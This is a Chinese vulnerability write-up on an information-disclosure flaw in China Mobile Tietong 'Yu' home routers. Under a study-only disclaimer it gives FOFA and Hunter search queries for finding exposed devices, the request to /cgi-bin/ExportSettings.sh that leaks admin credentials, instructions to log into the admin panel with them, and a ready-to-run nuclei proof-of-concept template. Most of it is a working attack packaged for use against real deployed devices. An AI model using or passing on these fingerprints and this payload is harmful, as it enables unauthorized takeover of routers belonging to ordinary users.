免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
漏洞描述:
中移铁通禹路由器支持宽带拨号、动态IP和静态IP三种上网模式,中移禹路由器ExportSettings处存在信息泄露漏洞,通过响应包的账号密码,攻击者可以获取后台权限。
系统指纹:
fofa:title=“互联世界 物联未来-登录”
鹰图:web.body=“互联世界 物联未来-登录”
漏洞复现:
访问网站主页
构造pyload
http://127.0.0.1/cgi-bin/ExportSettings.sh
使用响应读取到的账号密码登录后台
nuclei poc
id: zhongyitietong-xinxixielou
info:
name: 中移铁通禹路由器信息泄露漏洞
author: msk
severity: high
http:
- raw:
- |+
GET /cgi-bin/ExportSettings.sh HTTP/1.1
Host: {
{
Hostname}}
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
matchers:
- type: dsl
dsl:
- status_code==200